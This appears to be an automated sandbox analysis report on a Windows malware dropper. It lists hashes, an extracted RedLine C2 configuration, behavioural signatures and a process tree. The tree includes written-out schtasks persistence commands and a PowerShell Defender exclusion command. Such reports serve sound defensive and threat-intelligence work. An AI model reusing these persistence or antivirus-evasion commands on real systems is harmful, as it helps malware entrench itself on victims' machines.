Resubmissions
11-02-2024 08:10
240211-j212ragb47 1011-02-2024 08:09
240211-j2kprseb2w 1009-02-2024 18:28
240209-w4c4xsde9t 1002-02-2024 12:52
240202-p4dxwsgfej 1002-02-2024 12:45
240202-pzapnsgdbp 1016-01-2024 15:29
240116-sw8dbaehh3 1010-01-2024 14:41
240110-r2wq2ahchl 1010-01-2024 13:29
240110-qrqatshbg3 1022-12-2023 08:48
231222-kqp1sadghq 10Analysis
-
max time kernel
933s -
max time network
1801s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
10-01-2024 14:41
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231215-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
redline
kent
89.23.98.143:11627
-
auth_value
24d164ebaf8f462b9dc88d186199283b
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral2/files/0x000600000001af35-7419.dat family_zgrat_v1 -
Process spawned unexpected child process 24 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2356 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6140 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5580 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4016 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1380 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6020 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6044 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6056 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5692 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1964 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2356 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6008 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3104 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5296 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3208 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5444 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5604 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5448 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5796 816 schtasks.exe 140 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2884 816 schtasks.exe 140 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4304 created 96 4304 svchost.exe 15 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
resource yara_rule behavioral2/files/0x000600000001af16-7211.dat dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ brg.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 824 netsh.exe 4676 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion brg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion brg.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ephmm803xl4Xt4c0wIYM16Zs.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iIVeYgr4qCwFFqneJCi6oflw.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3yznG8ez4XFRVpTTGtT8TbfI.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe Conhost.exe -
Executes dropped EXE 20 IoCs
pid Process 5096 Temp2.exe 4936 asg.exe 4224 tuc5.exe 168 tuc5.tmp 2504 brg.exe 1604 VLTKBacdau.exe 400 tuc6.exe 4500 tuc6.tmp 2176 tuc2.exe 2880 tuc2.tmp 4304 svchost.exe 2544 VCDDaemon.exe 832 DefenderControl.exe 3608 Conhost.exe 200 WerFault.exe 2400 qemu-ga.exe 1516 reg.exe 3640 south.exe 2252 smell-the-roses.exe 524 3Nh3iUB0ixXPS46jElx130zZ.exe -
Loads dropped DLL 16 IoCs
pid Process 168 tuc5.tmp 168 tuc5.tmp 168 tuc5.tmp 4500 tuc6.tmp 4500 tuc6.tmp 4500 tuc6.tmp 2880 tuc2.tmp 2880 tuc2.tmp 2880 tuc2.tmp 2544 VCDDaemon.exe 2544 VCDDaemon.exe 2544 VCDDaemon.exe 2544 VCDDaemon.exe 2544 VCDDaemon.exe 2252 smell-the-roses.exe 2252 smell-the-roses.exe -
resource yara_rule behavioral2/files/0x000700000001ac3b-195.dat themida behavioral2/files/0x000700000001ac3b-196.dat themida behavioral2/memory/2504-209-0x0000000000CB0000-0x0000000001228000-memory.dmp themida behavioral2/memory/2504-244-0x0000000000CB0000-0x0000000001228000-memory.dmp themida -
resource yara_rule behavioral2/files/0x000700000001acc7-6273.dat upx -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA brg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 VLTKBacdau.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\SubDir\asg.exe Temp2.exe File opened for modification C:\Windows\SysWOW64\SubDir\asg.exe Temp2.exe File opened for modification C:\Windows\SysWOW64\SubDir\asg.exe asg.exe File opened for modification C:\Windows\SysWOW64\SubDir asg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2504 brg.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2504 set thread context of 508 2504 brg.exe 85 PID 2544 set thread context of 4368 2544 VCDDaemon.exe 93 PID 4368 set thread context of 536 4368 cmd.exe 98 PID 1516 set thread context of 1472 1516 reg.exe 110 -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1108 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 4436 2924 WerFault.exe 121 4404 2924 WerFault.exe 121 4132 2924 WerFault.exe 121 2264 2924 WerFault.exe 121 2352 2924 WerFault.exe 121 4976 2924 WerFault.exe 121 1320 2924 WerFault.exe 121 3996 2924 WerFault.exe 121 220 2924 WerFault.exe 121 1796 2924 WerFault.exe 121 2808 2924 WerFault.exe 121 424 2924 WerFault.exe 121 4284 2924 WerFault.exe 121 2384 2924 WerFault.exe 121 3652 2924 WerFault.exe 121 4700 2924 WerFault.exe 121 1272 2924 WerFault.exe 121 3480 2924 WerFault.exe 121 2324 2924 WerFault.exe 121 1352 1936 WerFault.exe 145 1744 1936 WerFault.exe 145 1880 1936 WerFault.exe 145 3376 1936 WerFault.exe 145 2020 1936 WerFault.exe 145 1952 1936 WerFault.exe 145 1172 1936 WerFault.exe 145 4716 1936 WerFault.exe 145 3692 1936 WerFault.exe 145 3024 2232 WerFault.exe 159 4668 2232 WerFault.exe 159 1384 2232 WerFault.exe 159 2336 2232 WerFault.exe 159 3368 2232 WerFault.exe 159 2748 2232 WerFault.exe 159 1172 2232 WerFault.exe 159 4040 2232 WerFault.exe 159 4160 2232 WerFault.exe 159 2244 3620 WerFault.exe 176 1296 3620 WerFault.exe 176 4976 3620 WerFault.exe 176 1012 3620 WerFault.exe 176 4792 3620 WerFault.exe 176 4436 3620 WerFault.exe 176 1748 3620 WerFault.exe 176 4896 3620 WerFault.exe 176 8 3620 WerFault.exe 176 1512 2844 WerFault.exe 193 4520 2844 WerFault.exe 193 4432 2844 WerFault.exe 193 1756 2844 WerFault.exe 193 740 2844 WerFault.exe 193 2376 2844 WerFault.exe 193 3004 2844 WerFault.exe 193 4568 2844 WerFault.exe 193 2500 2844 WerFault.exe 193 2284 2844 WerFault.exe 193 4404 3620 WerFault.exe 176 1560 3620 WerFault.exe 176 1904 2844 WerFault.exe 193 4788 2844 WerFault.exe 193 4388 2844 WerFault.exe 193 4528 2844 WerFault.exe 193 4040 2844 WerFault.exe 193 1296 2844 WerFault.exe 193 -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x000600000001add9-4743.dat nsis_installer_1 behavioral2/files/0x000600000001add9-4743.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 42 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4800 schtasks.exe 5104 schtasks.exe 1380 schtasks.exe 4108 schtasks.exe 4372 schtasks.exe 4660 schtasks.exe 5276 schtasks.exe 6028 schtasks.exe 5604 schtasks.exe 3480 schtasks.exe 5480 schtasks.exe 2148 schtasks.exe 2356 schtasks.exe 4736 schtasks.exe 4016 schtasks.exe 5692 schtasks.exe 3208 schtasks.exe 5796 schtasks.exe 1388 schtasks.exe 1168 schtasks.exe 5328 schtasks.exe 3104 schtasks.exe 5444 schtasks.exe 3876 schtasks.exe 2356 schtasks.exe 6020 schtasks.exe 6044 schtasks.exe 5296 schtasks.exe 6008 schtasks.exe 4884 schtasks.exe 3172 schtasks.exe 2244 schtasks.exe 6140 schtasks.exe 6056 schtasks.exe 1956 schtasks.exe 1964 schtasks.exe 5448 schtasks.exe 1908 schtasks.exe 4404 schtasks.exe 5920 schtasks.exe 5580 schtasks.exe 2884 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2384 timeout.exe 5136 timeout.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2504 brg.exe 2504 brg.exe 4304 svchost.exe 4304 svchost.exe 2544 VCDDaemon.exe 2544 VCDDaemon.exe 4368 cmd.exe 4368 cmd.exe 3608 Conhost.exe 4556 powershell.exe 4556 powershell.exe 4556 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1604 VLTKBacdau.exe 832 DefenderControl.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2544 VCDDaemon.exe 4368 cmd.exe 4368 cmd.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 96 4363463463464363463463463.exe Token: SeDebugPrivilege 5096 Temp2.exe Token: SeDebugPrivilege 4936 asg.exe Token: SeDebugPrivilege 2504 brg.exe Token: SeDebugPrivilege 1604 VLTKBacdau.exe Token: SeDebugPrivilege 536 MSBuild.exe Token: SeDebugPrivilege 3608 Conhost.exe Token: SeDebugPrivilege 1516 reg.exe Token: SeDebugPrivilege 4556 powershell.exe Token: SeIncreaseQuotaPrivilege 4556 powershell.exe Token: SeSecurityPrivilege 4556 powershell.exe Token: SeTakeOwnershipPrivilege 4556 powershell.exe Token: SeLoadDriverPrivilege 4556 powershell.exe Token: SeSystemProfilePrivilege 4556 powershell.exe Token: SeSystemtimePrivilege 4556 powershell.exe Token: SeProfSingleProcessPrivilege 4556 powershell.exe Token: SeIncBasePriorityPrivilege 4556 powershell.exe Token: SeCreatePagefilePrivilege 4556 powershell.exe Token: SeBackupPrivilege 4556 powershell.exe Token: SeRestorePrivilege 4556 powershell.exe Token: SeShutdownPrivilege 4556 powershell.exe Token: SeDebugPrivilege 4556 powershell.exe Token: SeSystemEnvironmentPrivilege 4556 powershell.exe Token: SeRemoteShutdownPrivilege 4556 powershell.exe Token: SeUndockPrivilege 4556 powershell.exe Token: SeManageVolumePrivilege 4556 powershell.exe Token: 33 4556 powershell.exe Token: 34 4556 powershell.exe Token: 35 4556 powershell.exe Token: 36 4556 powershell.exe Token: SeDebugPrivilege 1472 jsc.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 168 tuc5.tmp 4500 tuc6.tmp 2880 tuc2.tmp 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe 832 DefenderControl.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4936 asg.exe 4304 svchost.exe 4304 svchost.exe 3640 south.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 96 wrote to memory of 5096 96 4363463463464363463463463.exe 75 PID 96 wrote to memory of 5096 96 4363463463464363463463463.exe 75 PID 5096 wrote to memory of 4884 5096 Temp2.exe 79 PID 5096 wrote to memory of 4884 5096 Temp2.exe 79 PID 5096 wrote to memory of 4936 5096 Temp2.exe 78 PID 5096 wrote to memory of 4936 5096 Temp2.exe 78 PID 4936 wrote to memory of 3876 4936 asg.exe 81 PID 4936 wrote to memory of 3876 4936 asg.exe 81 PID 96 wrote to memory of 4224 96 4363463463464363463463463.exe 82 PID 96 wrote to memory of 4224 96 4363463463464363463463463.exe 82 PID 96 wrote to memory of 4224 96 4363463463464363463463463.exe 82 PID 4224 wrote to memory of 168 4224 tuc5.exe 83 PID 4224 wrote to memory of 168 4224 tuc5.exe 83 PID 4224 wrote to memory of 168 4224 tuc5.exe 83 PID 96 wrote to memory of 2504 96 4363463463464363463463463.exe 84 PID 96 wrote to memory of 2504 96 4363463463464363463463463.exe 84 PID 96 wrote to memory of 2504 96 4363463463464363463463463.exe 84 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 2504 wrote to memory of 508 2504 brg.exe 85 PID 96 wrote to memory of 1604 96 4363463463464363463463463.exe 86 PID 96 wrote to memory of 1604 96 4363463463464363463463463.exe 86 PID 96 wrote to memory of 1604 96 4363463463464363463463463.exe 86 PID 96 wrote to memory of 400 96 4363463463464363463463463.exe 87 PID 96 wrote to memory of 400 96 4363463463464363463463463.exe 87 PID 96 wrote to memory of 400 96 4363463463464363463463463.exe 87 PID 400 wrote to memory of 4500 400 tuc6.exe 88 PID 400 wrote to memory of 4500 400 tuc6.exe 88 PID 400 wrote to memory of 4500 400 tuc6.exe 88 PID 96 wrote to memory of 2176 96 4363463463464363463463463.exe 90 PID 96 wrote to memory of 2176 96 4363463463464363463463463.exe 90 PID 96 wrote to memory of 2176 96 4363463463464363463463463.exe 90 PID 2176 wrote to memory of 2880 2176 tuc2.exe 89 PID 2176 wrote to memory of 2880 2176 tuc2.exe 89 PID 2176 wrote to memory of 2880 2176 tuc2.exe 89 PID 96 wrote to memory of 4304 96 4363463463464363463463463.exe 91 PID 96 wrote to memory of 4304 96 4363463463464363463463463.exe 91 PID 96 wrote to memory of 4304 96 4363463463464363463463463.exe 91 PID 4304 wrote to memory of 2544 4304 svchost.exe 94 PID 4304 wrote to memory of 2544 4304 svchost.exe 94 PID 4304 wrote to memory of 2544 4304 svchost.exe 94 PID 2544 wrote to memory of 4368 2544 VCDDaemon.exe 93 PID 2544 wrote to memory of 4368 2544 VCDDaemon.exe 93 PID 2544 wrote to memory of 4368 2544 VCDDaemon.exe 93 PID 2544 wrote to memory of 4368 2544 VCDDaemon.exe 93 PID 4368 wrote to memory of 536 4368 cmd.exe 98 PID 4368 wrote to memory of 536 4368 cmd.exe 98 PID 4368 wrote to memory of 536 4368 cmd.exe 98 PID 4368 wrote to memory of 536 4368 cmd.exe 98 PID 96 wrote to memory of 832 96 4363463463464363463463463.exe 100 PID 96 wrote to memory of 832 96 4363463463464363463463463.exe 100 PID 96 wrote to memory of 832 96 4363463463464363463463463.exe 100 PID 96 wrote to memory of 3608 96 4363463463464363463463463.exe 453 PID 96 wrote to memory of 3608 96 4363463463464363463463463.exe 453 PID 96 wrote to memory of 3608 96 4363463463464363463463463.exe 453 PID 96 wrote to memory of 200 96 4363463463464363463463463.exe 512 PID 96 wrote to memory of 200 96 4363463463464363463463463.exe 512 PID 3608 wrote to memory of 2400 3608 Conhost.exe 105 PID 3608 wrote to memory of 2400 3608 Conhost.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:96 -
C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\SubDir\asg.exe"C:\Windows\SysWOW64\SubDir\asg.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3876
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4884
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\is-1K0I5.tmp\tuc5.tmp"C:\Users\Admin\AppData\Local\Temp\is-1K0I5.tmp\tuc5.tmp" /SL5="$B0060,4472331,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:168
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:508
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe"C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Local\Temp\is-KLKRL.tmp\tuc6.tmp"C:\Users\Admin\AppData\Local\Temp\is-KLKRL.tmp\tuc6.tmp" /SL5="$500CE,4469780,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4500
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4304
-
-
C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exeC:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2544
-
-
C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe"C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:832
-
-
C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"2⤵PID:3608
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"3⤵
- Executes dropped EXE
PID:2400
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CoercedPotato.exe"C:\Users\Admin\AppData\Local\Temp\Files\CoercedPotato.exe"2⤵PID:200
-
-
C:\Users\Admin\AppData\Local\Temp\Files\456.exe"C:\Users\Admin\AppData\Local\Temp\Files\456.exe"2⤵PID:1516
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\456.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Users\Admin\Pictures\3Nh3iUB0ixXPS46jElx130zZ.exe"C:\Users\Admin\Pictures\3Nh3iUB0ixXPS46jElx130zZ.exe"4⤵
- Executes dropped EXE
PID:524
-
-
C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe"C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe"4⤵PID:3632
-
-
C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"4⤵PID:2924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 3925⤵
- Program crash
PID:4436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 3765⤵
- Program crash
PID:4404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 4085⤵
- Program crash
PID:4132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 7165⤵
- Program crash
PID:2264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 7325⤵
- Program crash
PID:2352
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8325⤵
- Program crash
PID:4976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 7325⤵
- Program crash
PID:1320
-
-
